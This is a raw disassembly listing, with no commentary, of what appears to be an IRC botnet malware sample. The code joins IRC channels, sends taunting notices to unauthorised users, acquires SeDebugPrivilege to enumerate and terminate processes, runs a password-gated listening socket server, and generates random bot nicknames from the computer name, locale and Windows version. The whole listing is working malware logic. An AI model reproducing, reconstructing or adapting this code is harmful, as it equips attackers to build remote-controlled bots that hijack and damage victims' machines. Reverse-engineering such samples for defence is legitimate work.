mov esi, [ebp+esi+var_90]
cmp esi, ebx
mov [ebp+arg_0], esi
jz loc_40F239
cmp [ebp+var_AC], ebx
jnz loc_40F239
push offset asc_432E80 ; "!"
push [ebp+var_94]
call sub_418B6E
mov esi, eax
push offset dword_436EF4
push ebx
inc esi
call sub_418B6E
push offset asc_42F98C ; "~"
push eax
call sub_418B6E
push [ebp+arg_0]
mov edi, eax
push offset aCool ; "cool"
call sub_4176D0
add esp, 20h
test eax, eax
jz short loc_414FEE
lea eax, [ebp+var_D8]
push edi
push eax
lea eax, [ebp+var_D8]
push eax
push offset aNoticeSNiceTry ; "NOTICE %s :Nice try, idiot. (%s!%s).\r\n"
push [ebp+arg_4]
call sub_40D633
add esp, 14h
lea eax, [ebp+var_D8]
push eax
push offset aNoticeSYouVeBe ; "NOTICE %s :You've been logged.\r\n"
push [ebp+arg_4]
call sub_40D633
add esp, 0Ch
push edi
push esi
push offset dword_42F904
jmp loc_40F813
; ---------------------------------------------------------------------------
loc_414FEE: ; CODE XREF: sub_40EE72+6138�j
mov [ebp+arg_24], offset off_42F6C4
loc_414FF5: ; CODE XREF: sub_40EE72+619F�j
mov eax, [ebp+arg_24]
push edi
push dword ptr [eax]
call sub_4170B5
pop ecx
test eax, eax
pop ecx
jnz short loc_415055
add [ebp+arg_24], 4
cmp [ebp+arg_24], offset off_42F6C8
jb short loc_414FF5
lea eax, [ebp+var_D8]
push edi
push eax
lea eax, [ebp+var_D8]
push eax
push offset aNoticeSNiceTry ; "NOTICE %s :Nice try, idiot. (%s!%s).\r\n"
push [ebp+arg_4]
call sub_40D633
add esp, 14h
lea eax, [ebp+var_D8]
push eax
push offset aNoticeSYouVeBe ; "NOTICE %s :You've been logged.\r\n"
push [ebp+arg_4]
call sub_40D633
add esp, 0Ch
push edi
push esi
push offset dword_42F8C8
jmp loc_40F813
; ---------------------------------------------------------------------------
loc_415055: ; CODE XREF: sub_40EE72+6192�j
mov edi, [ebp+arg_18]
xor esi, esi
loc_41505A: ; CODE XREF: sub_40EE72+6212�j
cmp [ebp+arg_0], ebx
jz loc_40F239
cmp [edi], bl
jnz short loc_41507A
push [ebp+arg_0]
push offset aCool ; "cool"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz short loc_41508B
loc_41507A: ; CODE XREF: sub_40EE72+61F3�j
inc esi
add edi, 80h
cmp esi, 2
jl short loc_41505A
jmp loc_40F239
; ---------------------------------------------------------------------------
loc_41508B: ; CODE XREF: sub_40EE72+6206�j
shl esi, 7
add esi, [ebp+arg_18]
lea eax, [ebp+var_AA8]
push 7Fh
push eax
push esi
call sub_418C10
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz short loc_4150C2
push ebx
push [ebp+var_4]
push offset dword_42F89C
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40D679
add esp, 14h
loc_4150C2: ; CODE XREF: sub_40EE72+6234�j
lea eax, [ebp+var_D8]
push eax
push offset dword_42F86C
jmp loc_40F422
; ---------------------------------------------------------------------------
loc_4150D3: ; CODE XREF: sub_40EE72+20E�j
; sub_40EE72+223�j
push [ebp+arg_10]
push offset aUserhostS ; "USERHOST %s\r\n"
push [ebp+arg_4]
call sub_40D633
add esp, 0Ch
push offset aXi ; "+xi"
push [ebp+arg_10]
push offset aModeSS ; "MODE %s %s\r\n"
push [ebp+arg_4]
call sub_40D633
add esp, 10h
push [ebp+arg_C]
push [ebp+arg_8]
push offset aJoinSS ; "JOIN %s %s\r\n"
push [ebp+arg_4]
call sub_40D633
add esp, 10h
mov ds:dword_4CD76C, edi
jmp loc_40F10F
sub_40EE72 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41511F proc near ; CODE XREF: sub_409037+45�p
; sub_409037+166�p ...
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
lea eax, [ebp+var_4]
push eax
push 28h
call ds:dword_42413C ;; GetCurrentProcess
push eax
call ds:dword_43AD7C ;; OpenProcessToken
test eax, eax
jnz short loc_41513E
leave
retn
; ---------------------------------------------------------------------------
loc_41513E: ; CODE XREF: sub_41511F+1B�j
lea eax, [ebp+var_10]
push esi
push eax
xor esi, esi
push [ebp+arg_0]
push esi
call ds:dword_43AD54 ;; LookupPrivilegeValueA
test eax, eax
jz short loc_41517C
cmp [ebp+arg_4], esi
mov [ebp+var_14], 1
jz short loc_415165
or [ebp+var_8], 2
jmp short loc_415169
; ---------------------------------------------------------------------------
loc_415165: ; CODE XREF: sub_41511F+3E�j
and [ebp+var_8], 0FFFFFFFDh
loc_415169: ; CODE XREF: sub_41511F+44�j
push esi
push esi
lea eax, [ebp+var_14]
push esi
push eax
push esi
push [ebp+var_4]
call ds:dword_43AE04 ;; AdjustTokenPrivileges
mov esi, eax
loc_41517C: ; CODE XREF: sub_41511F+32�j
push [ebp+var_4]
call ds:off_424078
mov eax, esi
pop esi
leave
retn
sub_41511F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41518A proc near ; CODE XREF: sub_40EE72+4B66�p
; sub_41533B+74�p
var_550 = byte ptr -550h
var_350 = dword ptr -350h
var_34C = byte ptr -34Ch
var_230 = byte ptr -230h
var_12C = dword ptr -12Ch
var_128 = byte ptr -128h
var_124 = dword ptr -124h
var_108 = byte ptr -108h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 550h
push ebx
push esi
push edi
push 49h
xor ebx, ebx
pop ecx
xor eax, eax
cmp ds:dword_43ADB8, ebx
lea edi, [ebp+var_128]
mov [ebp+var_12C], ebx
rep stosd
mov ecx, 88h
lea edi, [ebp+var_34C]
mov [ebp+var_350], ebx
rep stosd
jz loc_415334
cmp ds:dword_43AD9C, ebx
jz loc_415334
cmp ds:dword_43ACB8, ebx
jz loc_415334
push 1
push offset aSedebugprivile ; "SeDebugPrivilege"
call sub_41511F
pop ecx
pop ecx
push ebx
push 0Fh
call ds:dword_43ADB8 ;; CreateToolhelp32Snapshot
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_415327
lea eax, [ebp+var_12C]
mov [ebp+var_12C], 128h
push eax
push [ebp+var_4]
call ds:dword_43AD9C ;; Process32First
mov esi, ds:off_424078
test eax, eax
jz loc_415322
loc_41522D: ; CODE XREF: sub_41518A+BE�j
; sub_41518A+CC�j ...
lea eax, [ebp+var_12C]
push eax
push [ebp+var_4]
call ds:dword_43ACB8 ;; Process32Next
test eax, eax
jz loc_415322
cmp [ebp+arg_10], ebx
jnz short loc_41522D
cmp [ebp+arg_C], ebx
jnz loc_4152DA
cmp [ebp+arg_4], ebx
jz short loc_41522D
push [ebp+var_124]
push 8
call ds:dword_43ADB8 ;; CreateToolhelp32Snapshot
cmp [ebp+arg_14], ebx
mov edi, eax
mov [ebp+var_350], 224h
jz short loc_415297
lea eax, [ebp+var_350]
push eax
push edi
call ds:dword_43AC64 ;; Module32First
push [ebp+var_124]
test eax, eax
jz short loc_41529D
lea eax, [ebp+var_230]
jmp short loc_4152A3
; ---------------------------------------------------------------------------
loc_415297: ; CODE XREF: sub_41518A+EB�j
push [ebp+var_124]
loc_41529D: ; CODE XREF: sub_41518A+103�j
lea eax, [ebp+var_108]
loc_4152A3: ; CODE XREF: sub_41518A+10B�j
push eax
lea eax, [ebp+var_550]
push offset aSD_0 ; " %s (%d)"
push eax
call sub_4172B0
add esp, 10h
lea eax, [ebp+var_550]
push 1
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D679
add esp, 14h
push edi
call esi ; sub_4E03D5
jmp loc_41522D
; ---------------------------------------------------------------------------
loc_4152DA: ; CODE XREF: sub_41518A+C3�j
push [ebp+arg_C]
lea eax, [ebp+var_108]
push eax
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz loc_41522D
push [ebp+var_124]
push ebx
push 1F0FFFh
call ds:dword_4240FC ;; OpenProcess
push [ebp+var_4]
mov edi, eax
call esi ; sub_4E03D5
push ebx
push edi
call ds:dword_424170 ;; TerminateProcess
test eax, eax
jnz short loc_41531D
push edi
call esi ; sub_4E03D5
jmp short loc_415334
; ---------------------------------------------------------------------------
loc_41531D: ; CODE XREF: sub_41518A+18C�j
push 1
pop eax
jmp short loc_415336
; ---------------------------------------------------------------------------
loc_415322: ; CODE XREF: sub_41518A+9D�j
; sub_41518A+B5�j
push [ebp+var_4]
call esi ; sub_4E03D5
loc_415327: ; CODE XREF: sub_41518A+75�j
push ebx
push offset aSedebugprivile ; "SeDebugPrivilege"
call sub_41511F
pop ecx
pop ecx
loc_415334: ; CODE XREF: sub_41518A+3A�j
; sub_41518A+46�j ...
xor eax, eax
loc_415336: ; CODE XREF: sub_41518A+196�j
pop edi
pop esi
pop ebx
leave
retn
sub_41518A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41533B proc near ; DATA XREF: sub_40EE72+595C�o
var_298 = byte ptr -298h
var_98 = dword ptr -98h
var_94 = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 298h
mov eax, [ebp+arg_0]
push esi
push edi
push 26h
pop ecx
mov esi, eax
lea edi, [ebp+var_98]
push offset unk_432F04
rep movsd
mov dword ptr [eax+94h], 1
lea eax, [ebp+var_298]
push eax
call sub_4172B0
xor esi, esi
pop ecx
cmp [ebp+var_8], esi
pop ecx
jnz short loc_41539A
push esi
lea eax, [ebp+var_298]
push [ebp+var_C]
push eax
lea eax, [ebp+var_94]
push eax
push [ebp+var_98]
call sub_40D679
add esp, 14h
loc_41539A: ; CODE XREF: sub_41533B+3D�j
push [ebp+var_10]
lea eax, [ebp+var_94]
push esi
push esi
push [ebp+var_C]
push eax
push [ebp+var_98]
call sub_41518A
add esp, 18h
test eax, eax
jnz short loc_4153C2
push offset unk_432ECC
jmp short loc_4153C7
; ---------------------------------------------------------------------------
loc_4153C2: ; CODE XREF: sub_41533B+7E�j
push offset unk_432E94
loc_4153C7: ; CODE XREF: sub_41533B+85�j
lea eax, [ebp+var_298]
push eax
call sub_4172B0
cmp [ebp+var_8], esi
pop ecx
pop ecx
jnz short loc_4153FA
push esi
lea eax, [ebp+var_298]
push [ebp+var_C]
push eax
lea eax, [ebp+var_94]
push eax
push [ebp+var_98]
call sub_40D679
add esp, 14h
loc_4153FA: ; CODE XREF: sub_41533B+9D�j
lea eax, [ebp+var_298]
push eax
call sub_40BF6D
push [ebp+var_14]
call sub_417078
pop ecx
pop ecx
push esi
call ds:dword_424054 ;; ExitThread
pop edi
pop esi
sub_41533B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_415419 proc near ; CODE XREF: sub_40EE72+4B08�p
; sub_416E97+53�p
arg_0 = dword ptr 4
push esi
push edi
push 1
pop edi
push [esp+8+arg_0]
push 0
push 1F0FFFh
call ds:dword_4240FC ;; OpenProcess
mov esi, eax
test esi, esi
jz short loc_41544B
push 0
push esi
call ds:dword_424170 ;; TerminateProcess
test eax, eax
jnz short loc_41544B
push esi
xor edi, edi
call ds:off_424078
loc_41544B: ; CODE XREF: sub_415419+1A�j
; sub_415419+27�j
mov eax, edi
pop edi
pop esi
retn
sub_415419 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415450 proc near ; CODE XREF: sub_4030D1+A�p
; _0:0040369E�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
call sub_41730C
mov esi, [ebp+arg_0]
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
fild [ebp+var_4]
sub eax, esi
mov [ebp+arg_4], eax
fimul [ebp+arg_4]
fmul ds:dbl_4246A0
call sub_417DC4
sub esi, eax
mov eax, esi
pop esi
leave
retn
sub_415450 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415480 proc near ; DATA XREF: sub_41570E+1BE�o
var_3D4 = byte ptr -3D4h
var_350 = byte ptr -350h
var_208 = dword ptr -208h
var_1F4 = dword ptr -1F4h
var_1F0 = dword ptr -1F0h
var_F0 = byte ptr -0F0h
var_B0 = byte ptr -0B0h
var_4C = byte ptr -4Ch
var_3C = byte ptr -3Ch
var_2C = byte ptr -2Ch
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 3D4h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 78h
mov esi, eax
pop ecx
lea edi, [ebp+var_3D4]
push 1
mov [ebp+var_C], 1Eh
pop ebx
rep movsd
mov [eax+1DCh], ebx
mov eax, [ebp+var_208]
mov [ebp+arg_0], eax
imul eax, 234h
lea esi, dword_4407FC[eax]
xor edi, edi
mov [ebp+var_8], edi
mov [ebp+var_1F4], ebx
mov eax, [esi]
mov [ebp+var_1F0], eax
lea eax, [ebp+var_C]
push eax
push edi
lea eax, [ebp+var_1F4]
push edi
push eax
push edi
call ds:dword_43AD80 ;; select
test eax, eax
jnz short loc_415504
push dword ptr [esi]
call ds:dword_43AE30 ;; closesocket
push [ebp+arg_0]
call sub_417078
pop ecx
push edi
call ds:dword_424054 ;; ExitThread
loc_415504: ; CODE XREF: sub_415480+6A�j
push edi
lea eax, [ebp+var_3C]
push ebx
push eax
push dword ptr [esi]
call ds:dword_43ADB0 ;; recv
lea eax, [ebp+var_2C]
push 10h
push eax
push dword ptr [esi]
call sub_415685
lea eax, [ebp+var_4C]
push 10h
push eax
push dword ptr [esi]
call sub_415685
lea eax, [ebp+var_F0]
push 40h
push eax
push dword ptr [esi]
call sub_415685
add esp, 24h
lea eax, [ebp+var_4]
mov [ebp+var_4], 10h
push eax
lea eax, [ebp+var_1C]
push eax
push dword ptr [esi]
call ds:dword_43ACF4 ;; getpeername
test eax, eax
jz short loc_41557D
call ds:dword_43AD2C ;; WSAGetLastError
push eax
push offset dword_432FF8
call sub_40BFE1
push [ebp+arg_0]
call sub_417078
add esp, 0Ch
push edi
call ds:dword_424054 ;; ExitThread
loc_41557D: ; CODE XREF: sub_415480+D8�j
push 2
lea eax, [ebp+var_18]
push 4
push eax
call ds:dword_43AD50 ;; gethostbyaddr
cmp eax, edi
jnz short loc_4155A7
push [ebp+var_18]
call ds:dword_43AE24 ;; inet_ntoa
push eax
lea eax, [ebp+var_B0]
push eax
call sub_4172B0
jmp short loc_4155B5
; ---------------------------------------------------------------------------
loc_4155A7: ; CODE XREF: sub_415480+10D�j
push dword ptr [eax]
lea eax, [ebp+var_B0]
push eax
call sub_4179C0
loc_4155B5: ; CODE XREF: sub_415480+125�j
pop ecx
pop ecx
push edi
push ebx
push offset byte_436EDC
push dword ptr [esi]
call ds:dword_43ADE8 ;; send
cmp ds:dword_4CD77C, edi
jnz short loc_415617
push [ebp+var_18]
lea eax, [ebp+var_350]
push eax
lea eax, [ebp+var_B0]
push eax
lea eax, [ebp+var_2C]
push eax
call sub_4156DF
add esp, 10h
test eax, eax
jnz short loc_415617
push edi
push 13h
push offset aPermissionDeni ; "Permission denied\n"
push dword ptr [esi]
call ds:dword_43ADE8 ;; send
push dword ptr [esi]
call ds:dword_43AE30 ;; closesocket
push [ebp+arg_0]
call sub_417078
pop ecx
push edi
call ds:dword_424054 ;; ExitThread
loc_415617: ; CODE XREF: sub_415480+14C�j
; sub_415480+16D�j
lea eax, [ebp+var_B0]
push eax
lea eax, [ebp+var_2C]
push eax
push offset dword_432FAC
call sub_40BFE1
push [ebp+arg_0]
call sub_4165C6
add esp, 10h
test eax, eax
jnz short loc_41565E
call ds:dword_42408C ;; RtlGetLastWin32Error
push eax
push offset dword_432F70
call sub_40BFE1
push [ebp+arg_0]
call sub_417078
add esp, 0Ch
push ebx
call ds:dword_424054 ;; ExitThread
loc_41565E: ; CODE XREF: sub_415480+1B9�j
lea eax, [ebp+var_B0]
push eax
lea eax, [ebp+var_2C]
push eax
push offset dword_432F38
call sub_40BFE1
push [ebp+arg_0]
call sub_417078
add esp, 10h
push edi
call ds:dword_424054 ;; ExitThread
sub_415480 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415685 proc near ; CODE XREF: sub_415480+9A�p
; sub_415480+A7�p ...
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push esi
push 0
lea eax, [ebp+var_1]
push 1
push eax
push [ebp+arg_0]
call ds:dword_43ADB0 ;; recv
cmp eax, 1
jnz short loc_4156D5
mov esi, [ebp+arg_4]
loc_4156A3: ; CODE XREF: sub_415685+41�j
mov al, [ebp+var_1]
mov [esi], al
inc esi
dec [ebp+arg_8]
jz short loc_4156CA
test al, al
jz short loc_4156D9
push 0
lea eax, [ebp+var_1]
push 1
push eax
push [ebp+arg_0]
call ds:dword_43ADB0 ;; recv
cmp eax, 1
jz short loc_4156A3
jmp short loc_4156D5
; ---------------------------------------------------------------------------
loc_4156CA: ; CODE XREF: sub_415685+27�j
push offset dword_433034
call sub_40BFE1
pop ecx
loc_4156D5: ; CODE XREF: sub_415685+19�j
; sub_415685+43�j
xor eax, eax
jmp short loc_4156DC
; ---------------------------------------------------------------------------
loc_4156D9: ; CODE XREF: sub_415685+2B�j
push 1
pop eax
loc_4156DC: ; CODE XREF: sub_415685+52�j
pop esi
leave
retn
sub_415685 endp
; =============== S U B R O U T I N E =======================================
sub_4156DF proc near ; CODE XREF: sub_415480+163�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push [esp+arg_0]
push [esp+4+arg_8]
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz short loc_41570A
push [esp+arg_4]
push [esp+4+arg_0]
push offset dword_43306C
call sub_40BFE1
add esp, 0Ch
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41570A: ; CODE XREF: sub_4156DF+11�j
push 1
pop eax
retn
sub_4156DF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41570E proc near ; DATA XREF: sub_40EE72+5623�o
var_5DC = dword ptr -5DCh
var_5A4 = byte ptr -5A4h
var_414 = byte ptr -414h
var_214 = dword ptr -214h
var_210 = byte ptr -210h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = byte ptr -34h
var_32 = word ptr -32h
var_30 = dword ptr -30h
var_24 = byte ptr -24h
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 5A4h
mov eax, [ebp+arg_0]
push esi
push edi
push 78h
pop ecx
mov esi, eax
lea edi, [ebp+var_214]
push 1
rep movsd
pop edi
mov [eax+1DCh], edi
lea eax, [ebp+var_5A4]
push eax
push 202h
call ds:dword_43AD10 ;; WSAStartup
xor esi, esi
cmp eax, esi
jz short loc_415767
push eax
push offset dword_433230
call sub_40BFE1
push [ebp+var_4C]
call sub_417078
add esp, 0Ch
push edi
call ds:dword_424054 ;; ExitThread
loc_415767: ; CODE XREF: sub_41570E+3A�j
push edi
push offset loc_41598C
call ds:dword_424174 ;; SetConsoleCtrlHandler
test eax, eax
jnz short loc_4157A0
call ds:dword_42408C ;; RtlGetLastWin32Error
push eax
push offset dword_4331E0
call sub_40BFE1
pop ecx
pop ecx
call ds:dword_43ACF8 ;; WSACleanup
push [ebp+var_4C]
call sub_417078
pop ecx
push edi
call ds:dword_424054 ;; ExitThread
loc_4157A0: ; CODE XREF: sub_41570E+67�j
push ebx
push 10h
lea eax, [ebp+var_20]
push esi
push eax
call sub_417330
add esp, 0Ch
mov [ebp+var_20], 2
push [ebp+var_50]
call ds:dword_43AD98 ;; htons
push 6
push edi
push 2
mov [ebp+var_1E], ax
mov [ebp+var_1C], esi
call ds:dword_43AE18 ;; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_415917
mov eax, [ebp+var_4C]
push 10h
imul eax, 234h
mov ds:dword_4407FC[eax], ebx
lea eax, [ebp+var_20]
push eax
push ebx
call ds:dword_43ADC4 ;; bind
test eax, eax
jnz loc_415917
push 7FFFFFFFh
push ebx
call ds:dword_43ADC0 ;; listen
test eax, eax
jnz loc_415917
push offset dword_433194
mov [ebp+var_10], 0Ch
mov [ebp+var_C], esi
mov [ebp+var_8], esi
call sub_40BF6D
pop ecx
mov [ebp+arg_0], edi
loc_41582F: ; CODE XREF: sub_41570E+15A�j
; sub_41570E+1E4�j
lea eax, [ebp+var_4]
mov [ebp+var_4], 10h
push eax
lea eax, [ebp+var_34]
push eax
push ebx
call ds:dword_43AE2C ;; accept
mov edi, eax
cmp edi, 0FFFFFFFFh
jz loc_41591A
push [ebp+arg_0]
lea eax, [ebp+arg_0]
push eax
push 8
push 0FFFFh
push edi
call ds:dword_43AD78 ;; setsockopt
cmp eax, 0FFFFFFFFh
jz short loc_41582F
movzx eax, [ebp+var_32]
push [ebp+var_4C]
mov [ebp+var_38], esi
push eax
push [ebp+var_30]
call ds:dword_43AE24 ;; inet_ntoa
push eax
lea eax, [ebp+var_414]
push offset dword_433140
push eax
call sub_4172B0
lea eax, [ebp+var_414]
push eax
call sub_40BF6D
push edi
lea eax, [ebp+var_414]
push 6
push eax
call sub_416D5C
mov [ebp+var_48], eax
imul eax, 234h
mov ecx, [ebp+var_4C]
add esp, 24h
mov ds:dword_4407F4[eax], ecx
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_214]
push esi
push eax
push offset sub_415480
lea eax, [ebp+var_10]
push esi
push eax
call ds:dword_4240A0 ;; CreateThread
mov ecx, [ebp+var_48]
imul ecx, 234h
cmp eax, esi
mov ds:dword_440804[ecx], eax
jz short loc_415902
loc_4158EF: ; CODE XREF: sub_41570E+1F2�j
cmp [ebp+var_38], esi
jnz loc_41582F
push 32h
call ds:dword_424064 ;; Sleep
jmp short loc_4158EF
; ---------------------------------------------------------------------------
loc_415902: ; CODE XREF: sub_41570E+1DF�j
call ds:dword_42408C ;; RtlGetLastWin32Error
push eax
push offset dword_4330F4
call sub_40BFE1
pop ecx
pop ecx
jmp short loc_41591A
; ---------------------------------------------------------------------------
loc_415917: ; CODE XREF: sub_41570E+C8�j
; sub_41570E+EC�j ...
mov edi, [ebp+arg_0]
loc_41591A: ; CODE XREF: sub_41570E+13C�j
; sub_41570E+207�j
call ds:dword_43AD2C ;; WSAGetLastError
push eax
lea eax, [ebp+var_414]
push offset dword_4330B0
push eax
call sub_4172B0
add esp, 0Ch
cmp [ebp+var_3C], esi
jnz short loc_41595A
push esi
lea eax, [ebp+var_414]
push [ebp+var_40]
push eax
lea eax, [ebp+var_210]
push eax
push [ebp+var_214]
call sub_40D679
add esp, 14h
loc_41595A: ; CODE XREF: sub_41570E+22A�j
lea eax, [ebp+var_414]
push eax
call sub_40BF6D
pop ecx
push edi
call ds:dword_43AE30 ;; closesocket
push ebx
call ds:dword_43AE30 ;; closesocket
call ds:dword_43ACF8 ;; WSACleanup
push [ebp+var_4C]
call sub_417078
pop ecx
push esi
call ds:dword_424054 ;; ExitThread
pop ebx
loc_41598C: ; DATA XREF: sub_41570E+5A�o
xor eax, eax
cmp [esp+5E0h+var_5DC], eax
setz al
retn
sub_41570E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_415996 proc near ; CODE XREF: sub_415D01+49�p
; DATA XREF: _2:off_433280�o
var_C = dword ptr -0Ch
arg_0 = dword ptr 4
push esi
push edi
call ds:dword_424058 ;; GetTickCount
push eax
call sub_417302
mov edi, [esp+0Ch+arg_0]
mov [esp+0Ch+var_C], offset aBot ; "[bot]-"
push offset aS_3 ; "%s"
push 1Ch
push edi
call sub_41782A
xor esi, esi
add esp, 10h
cmp ds:dword_42F5C8, esi
jle short loc_4159EF
loc_4159C9: ; CODE XREF: sub_415996+57�j
call sub_41730C
push 0Ah
cdq
pop ecx
idiv ecx
push edx
push edi
push offset dword_4332D4
push 1Ch
push edi
call sub_41782A
add esp, 14h
inc esi
cmp esi, ds:dword_42F5C8
jl short loc_4159C9
loc_4159EF: ; CODE XREF: sub_415996+31�j
mov eax, edi
pop edi
pop esi
retn
sub_415996 endp
; =============== S U B R O U T I N E =======================================
sub_4159F4 proc near ; CODE XREF: sub_40EE72+3E7F�p
arg_0 = dword ptr 4
push ebx
push esi
push edi
call ds:dword_424058 ;; GetTickCount
push eax
call sub_417302
pop ecx
call sub_41730C
push 3
mov ebx, [esp+10h+arg_0]
cdq
pop ecx
xor edi, edi
idiv ecx
mov esi, edx
add esi, ds:dword_42F5C8
test esi, esi
jle short loc_415A37
loc_415A21: ; CODE XREF: sub_4159F4+41�j
call sub_41730C
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov [edi+ebx], dl
inc edi
cmp edi, esi
jl short loc_415A21
loc_415A37: ; CODE XREF: sub_4159F4+2B�j
and byte ptr [edi+ebx], 0
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_4159F4 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push ecx
and dword ptr [ebp-4], 0
push esi
push edi
mov dword ptr [ebp-8], 100h
call ds:dword_424058 ;; GetTickCount
push eax
call sub_417302
pop ecx
lea eax, [ebp-8]
mov esi, offset byte_4332DC
push eax
push esi
call ds:dword_424154 ;; GetComputerNameA
movsx eax, ds:byte_4332DC
push 41h
pop ecx
push 1
pop edx
loc_415A7D: ; CODE XREF: _0:00415A88�j
cmp eax, ecx
jnz short loc_415A84
mov [ebp-4], edx
loc_415A84: ; CODE XREF: _0:00415A7F�j
inc ecx
cmp ecx, 5Bh
jl short loc_415A7D
push 61h
pop ecx
loc_415A8D: ; CODE XREF: _0:00415A98�j
cmp eax, ecx
jnz short loc_415A94
mov [ebp-4], edx
loc_415A94: ; CODE XREF: _0:00415A8F�j
inc ecx
cmp ecx, 7Bh
jl short loc_415A8D
mov edi, [ebp+8]
push esi
push 1Ch
push edi
call sub_41782A
xor esi, esi
add esp, 0Ch
cmp ds:dword_42F5C8, esi
jle short loc_415AD9
loc_415AB3: ; CODE XREF: _0:00415AD7�j
call sub_41730C
push 0Ah
cdq
pop ecx
idiv ecx
push edx
push edi
push offset dword_4332D4
push 1Ch
push edi
call sub_41782A
add esp, 14h
inc esi
cmp esi, ds:dword_42F5C8
jl short loc_415AB3
loc_415AD9: ; CODE XREF: _0:00415AB1�j
mov eax, edi
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
call ds:dword_424058 ;; GetTickCount
push eax
call sub_417302
pop ecx
lea eax, [ebp-0Ch]
push 0Ah
push eax
push 7
push 800h
call ds:dword_424178 ;; GetLocaleInfoA
mov edi, [ebp+8]
lea eax, [ebp-0Ch]
push eax
push offset dword_4332E0
push 1Ch
push edi
call sub_41782A
xor esi, esi
add esp, 10h
cmp ds:dword_42F5C8, esi
jle short loc_415B4E
loc_415B28: ; CODE XREF: _0:00415B4C�j
call sub_41730C
push 0Ah
cdq
pop ecx
idiv ecx
push edx
push edi
push offset dword_4332D4
push 1Ch
push edi
call sub_41782A
add esp, 14h
inc esi
cmp esi, ds:dword_42F5C8
jl short loc_415B28
loc_415B4E: ; CODE XREF: _0:00415B26�j
mov eax, edi
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 94h
push esi
lea eax, [ebp-94h]
push edi
push eax
mov esi, offset byte_436EDC
mov dword ptr [ebp-94h], 94h
call ds:dword_424144 ;; GetVersionExA
call ds:dword_424058 ;; GetTickCount
push eax
call sub_417302
cmp dword ptr [ebp-90h], 4
pop ecx
jnz short loc_415BD8
cmp dword ptr [ebp-8Ch], 0
jnz short loc_415BB8
cmp dword ptr [ebp-84h], 1
jnz short loc_415BA8
mov esi, offset a95 ; "95"
loc_415BA8: ; CODE XREF: _0:00415BA1�j
cmp dword ptr [ebp-84h], 2
jnz short loc_415C14
mov esi, offset aNt ; "NT"
jmp short loc_415C14
; ---------------------------------------------------------------------------
loc_415BB8: ; CODE XREF: _0:00415B98�j
cmp dword ptr [ebp-8Ch], 0Ah
jnz short loc_415BC8
mov esi, offset a98 ; "98"
jmp short loc_415C14
; ---------------------------------------------------------------------------
loc_415BC8: ; CODE XREF: _0:00415BBF�j
cmp dword ptr [ebp-8Ch], 5Ah
jnz short loc_415C0F
mov esi, offset aMe ; "ME"
jmp short loc_415C14
; ---------------------------------------------------------------------------
loc_415BD8: ; CODE XREF: _0:00415B8F�j
cmp dword ptr [ebp-90h], 5
jnz short loc_415C0F
cmp dword ptr [ebp-8Ch], 0
jnz short loc_415BF1
mov esi, offset a2k ; "2K"
jmp short loc_415C14
; ---------------------------------------------------------------------------
loc_415BF1: ; CODE XREF: _0:00415BE8�j
cmp dword ptr [ebp-8Ch], 1
jnz short loc_415C01
mov esi, offset aXp ; "XP"
jmp short loc_415C14
; ---------------------------------------------------------------------------
loc_415C01: ; CODE XREF: _0:00415BF8�j
cmp dword ptr [ebp-8Ch], 2
mov esi, offset dword_4332EC
jz short loc_415C14
